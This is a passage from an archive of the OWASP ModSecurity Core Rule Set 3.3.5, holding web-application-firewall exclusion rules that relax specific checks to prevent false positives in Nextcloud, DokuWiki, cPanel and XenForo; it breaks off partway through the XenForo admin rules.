type 'text/calendar' SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ "id:9003330,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'" # Allow modifying calendar events via the web interface SecRule REQUEST_METHOD "@streq PUT" \ "id:9003331,\ phase:1,\ pass,\ t:none,\ nolog,\ chain" SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ "t:none,\ ctl:ruleRemoveById=200002" # [ Notes ] # # We want to allow a lot of things as the user is # allowed to note on anything. SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ "id:9003340,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveByTag=attack-injection-php,\ ver:'OWASP_CRS/3.3.5'" # [ Bookmarks ] # # Allow urls in data. SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ "id:9003350,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=931130,\ ver:'OWASP_CRS/3.3.5'" # # [ Login forms ] # # This removes checks on the 'password' and related fields: # User login password. SecRule REQUEST_FILENAME "@contains /index.php/login" \ "id:9003400,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ ver:'OWASP_CRS/3.3.5'" # Reset password. SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ "id:9003410,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # Change Password and Setting up a new user/password SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ "id:9003500,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-NEXTCLOUD-ADMIN" SecMarker "END-NEXTCLOUD" modsecurity-crs-3.3.5/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf000066400000000000000000000173241446122515100244060ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default Dokuwiki install. # The exclusions are only active if crs_exclusions_dokuwiki=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # Note, if you want to relax the upload restrictions, # see rule 900240. For Dokuwiki you can limit the exception # to the ajax.php file: # # SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ... # SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ "id:9004000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOKUWIKI" SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ "id:9004001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOKUWIKI" # # -=[ Dokuwiki Front-End ]=- # # Note on files specified: # /doku.php: shows pages, saves, edits, admin # /lib/exe/ajax.php: autosave, uploads # # Allow pages to be edited, and ajax to save drafts. # # ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things, # as the page (in part or whole) is passed via 'suffix/prefix' at times. # attack-protocol (921110-921160/920230): Allows odd characters on the page. # CRS: (still need attack-protocol specified.) # attack-injection-php (930000-933999): Allows code on page. # attack-sqli (940000-942999): Allows SQL expressions on page. # # Others: # 930100-930110;REQUEST_BODY: if there's a /../ in the text. # # ARGS:summary (the text in the 'summary' box on page edits.): # Allowing 930120-930130 lets user save summaries with # system file names. This should not be needed in normal # use. But leaving a note here of how to allow in rule below: # ctl:ruleRemoveTargetById=930120;ARGS:summary # ctl:ruleRemoveTargetById=930130;ARGS:summary # # Also, can't specify: # SecRule ARGS:do "@streq edit" \ # SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\ # because at times the do=edit can get dropped, so if we use # above the edit will get blocked when the page is saved. # Hint: those using .htaccess rewrites can remove/replace # this first 'SecRule...' line with 'SecAction \' (unsupported). SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \ "id:9004100,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ chain" SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\ ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\ ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\ ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY" # Allow it to upload files. But check for cookies just to make sure. SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \ "id:9004110,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ chain" SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ "t:none,\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'" # Show the index, even if things like "postgresql" or other things show up. SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004130,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:do "@streq index" \ "t:none,\ chain" SecRule &ARGS:do "@eq 1" \ "t:none,\ ctl:ruleRemoveById=951240,\ ctl:ruleRemoveById=953110" # # [ Login form ] # # Turn off checks for password. SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004200,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:do "@streq login" \ "t:none,\ chain" SecRule &ARGS:do "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p" # # [ Admin Area ] # # Skip this section for performance unless do=admin is in request SecRule ARGS:do "!@streq admin" \ "id:9004300,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOKUWIKI-ADMIN" SecRule ARGS:do "!@streq admin" \ "id:9004310,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOKUWIKI-ADMIN" # [ Reset password ] # # Turn off checks for pass1, pass1-text, pass2 SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004320,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:do "@streq login" \ "t:none,\ chain" SecRule &ARGS:do "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # [ Save config ] # # Allow the config to be saved: # 942200: If the user adds "..." to tagline: ARGS:config[tagline] # 942430: if ARGS:config[hidepages] has pages looking like sql statements # 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004370,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ chain" SecRule &ARGS:page "@eq 1" \ "t:none,\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ chain" SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ "t:none,\ ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\ ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\ ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\ ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]" # When the config loads after a save, it gets blocked because # it has 'readdir' and lines that look like sql # 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] # 951240,953110: When the page reloads, it triggers # postgres and php code disclosure rules. SecRule REQUEST_FILENAME "@endsWith /doku.php" \ "id:9004380,\ phase:2,\ pass,\ t:none,\ nolog,\ noauditlog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ chain" SecRule &ARGS:page "@eq 1" \ "t:none,\ chain" SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ "t:none,\ ctl:ruleRemoveById=951240,\ ctl:ruleRemoveById=953110" # End [ Admin Area ] SecMarker "END-DOKUWIKI-ADMIN" SecMarker "END-DOKUWIKI" modsecurity-crs-3.3.5/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf000066400000000000000000000036321446122515100241200ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default cPanel environment. # The exclusions are only active if crs_exclusions_cpanel=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ "id:9005000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-CPANEL" SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ "id:9005001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-CPANEL" # # [ cPanel whm-server-status ] # # Cpanel's WHM auto generates requests to /whm-server-status from # 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes. # These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins). # # # Rule to allow cPanel whm-server-status requests from localhost without log entry. # SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \ "id:9005100,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ ctl:ruleRemoveById=920280,\ ctl:ruleRemoveById=920350" SecMarker "END-CPANEL" modsecurity-crs-3.3.5/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf000066400000000000000000000437461446122515100243110ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default XenForo install. # The exclusions are only active if crs_exclusions_xenforo=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ "id:9006000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-XENFORO" SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ "id:9006001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-XENFORO" # # -=[ XenForo Front-End ]=- # # Proxy for images and remote content embedded in forum posts # GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo # GET /xf/proxy.php?link=https://example.com&hash=foo # POST /xf/proxy.php, body: referrer=... SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ "id:9006100,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ ver:'OWASP_CRS/3.3.5'" # Store drafts for private message, forum post, thread reply # POST /xf/conversations/draft # POST /xf/conversations/convo-title.12345/draft # POST /xf/forums/forum-title.12345/draft # POST /xf/threads/thread-title-%E2%98%85.12345/draft # # attachment_hash_combined example: # {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."} SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \ "id:9006110,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:href,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ ver:'OWASP_CRS/3.3.5'" # Send PM, edit post, create thread, reply to thread # POST /xf/conversations/add # POST /xf/conversations/add-preview # POST /xf/conversations/messages/1463947/edit # POST /xf/posts/12345/edit # POST /xf/posts/12345/preview # POST /xf/conversations/convo-title.12345/add-reply # POST /xf/threads/thread-title.12345/add-reply # POST /xf/threads/thread-title.12345/reply-preview # POST /xf/forums/forum-title.12345/post-thread # POST /xf/forums/blogs/post-thread # POST /xf/forums/forum-title.12345/thread-preview SecRule REQUEST_FILENAME "@rx /(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \ "id:9006120,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ ver:'OWASP_CRS/3.3.5'" # Quote # POST /xf/posts/12345/quote SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ "id:9006130,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ ver:'OWASP_CRS/3.3.5'" # Multi quote # POST /xf/conversations/convo-title.12345/multi-quote # POST /xf/threads/thread-title.12345/multi-quote # quotes={"12345":["quote-html"]} SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ "id:9006140,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ ver:'OWASP_CRS/3.3.5'" # Delete thread # POST /xf/threads/thread-title.12345/delete SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ "id:9006150,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ ver:'OWASP_CRS/3.3.5'" # Feature thread # POST /xf/threads/thread-title.12345/feature-edit SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \ "id:9006155,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]" # Inline moderate thread # POST /xf/inline-mod/ SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ "id:9006160,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ver:'OWASP_CRS/3.3.5'" # Warn member # POST /xf/members/name.12345/warn # POST /xf/posts/12345/warn SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ "id:9006170,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ ver:'OWASP_CRS/3.3.5'" # Editor SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ "id:9006200,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\ ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ ver:'OWASP_CRS/3.3.5'" # Editor SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ "id:9006210,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ ver:'OWASP_CRS/3.3.5'" # Post attachment # POST /xf/account/avatar # POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \ "id:9006220,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=200003,\ ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\ ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ ver:'OWASP_CRS/3.3.5'" # Media # POST /xf/index.php?editor/media SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ "id:9006230,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetById=942130;ARGS:url,\ ver:'OWASP_CRS/3.3.5'" # Emoji # GET /xf/index.php?misc/find-emoji&q=(%0A%0A SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ "id:9006240,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=921151;ARGS:q,\ ver:'OWASP_CRS/3.3.5'" # Login # POST /xf/login/login SecRule REQUEST_FILENAME "@endsWith /login/login" \ "id:9006300,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ ver:'OWASP_CRS/3.3.5'" # Register account # POST /xf/register/register # The password is passed in a variable-name form parameter. We don't # want to exclude all parameters completely as this would cause an # unacceptable bypass. So, we exclude only commonly hit rules. SecRule REQUEST_FILENAME "@endsWith /register/register" \ "id:9006310,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\ ver:'OWASP_CRS/3.3.5'" # Confirm account # GET /xf/account-confirmation/name.12345/email?c=foo SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \ "id:9006315,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c" # Edit account # POST /xf/account/account-details SecRule REQUEST_FILENAME "@endsWith /account/account-details" \ "id:9006320,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\ ver:'OWASP_CRS/3.3.5'" # Lost password # POST /xf/lost-password/user-name.12345/confirm?c=foo SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \ "id:9006330,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\ ver:'OWASP_CRS/3.3.5'" # Set forum signature # POST /xf/account/signature SecRule REQUEST_FILENAME "@endsWith /account/signature" \ "id:9006340,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\ ver:'OWASP_CRS/3.3.5'" # Search # POST /xf/search/search SecRule REQUEST_FILENAME "@endsWith /search/search" \ "id:9006400,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\ ctl:ruleRemoveTargetById=942200;ARGS:constraints,\ ctl:ruleRemoveTargetById=942260;ARGS:constraints,\ ctl:ruleRemoveTargetById=942340;ARGS:constraints,\ ctl:ruleRemoveTargetById=942370;ARGS:constraints,\ ver:'OWASP_CRS/3.3.5'" # Search within thread # GET /xf/threads/foo.12345/page12?highlight=foo SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \ "id:9006410,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\ ver:'OWASP_CRS/3.3.5'" # Search within search result # GET /xf/search/12345/?q=foo SecRule REQUEST_FILENAME "@rx /search/\d+/$" \ "id:9006420,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\ ver:'OWASP_CRS/3.3.5'" # Contact form # POST /xf/misc/contact SecRule REQUEST_FILENAME "@endsWith /misc/contact" \ "id:9006500,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\ ver:'OWASP_CRS/3.3.5'" # Report post # POST /xf/posts/12345/report SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \ "id:9006510,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ver:'OWASP_CRS/3.3.5'" # Alternate thread view route # /xf/index.php?threads/title-having-some-sql.12345/ # # Especially threads with the HAVING sql keyword are FP prone. # This rule has some chains to narrow down the exclusion, # making it harder for an attacker to abuse the ARGS_NAMES # exclusion on other endpoints. SecRule REQUEST_FILENAME "@endsWith /index.php" \ "id:9006600,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_METHOD "@streq GET" \ "t:none,\ chain" SecRule &ARGS "@eq 1" \ "t:none,\ chain" SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \ "t:none,\ ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\ ctl:ruleRemoveTargetById=942230;ARGS_NAMES" # Browser fingerprint (DBTech security extension) # May Contain various javascript/XSS false positives SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \ "id:9006700,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\ ver:'OWASP_CRS/3.3.5'" # Get location info SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \ "id:9006710,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\ ver:'OWASP_CRS/3.3.5'" # # -=[ XenForo Global Exclusions ]=- # # _xfRedirect, _xfRequestUri can appear on various endpoints. # Cookies can appear on all endpoints. SecAction \ "id:9006800,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\ ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\ ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\ ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\ ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\ ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\ ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\ ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\ ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\ ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\ ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\ ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\ ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\ ver:'OWASP_CRS/3.3.5'" # # -=[ XenForo Administration Back-End ]=- # # Skip this section for performance unless requested file is admin.php SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ "id:9006900,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-XENFORO-ADMIN" SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ "id:9006901,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-XENFORO-ADMIN" # Admin edit user # POST /xf/admin.php?users/the-user-name.12345/edit SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \ "id:9006910,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ ver:'OWASP_CRS/3.3.5'" # Admin save user # POST /xf/admin.php?users/the-user-name.12345/save # Runs in phase 1 to be able to remove rule 200003. SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \ "id:9006920,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=200003,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\ ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ ver:'OWASP_CRS/3.3.5'" # Admin edit forum notice # POST /xf/admin.php?notices/0/save # POST /xf/admin.php?notices/forum-name.12345/save SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \ "id:9006930,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ 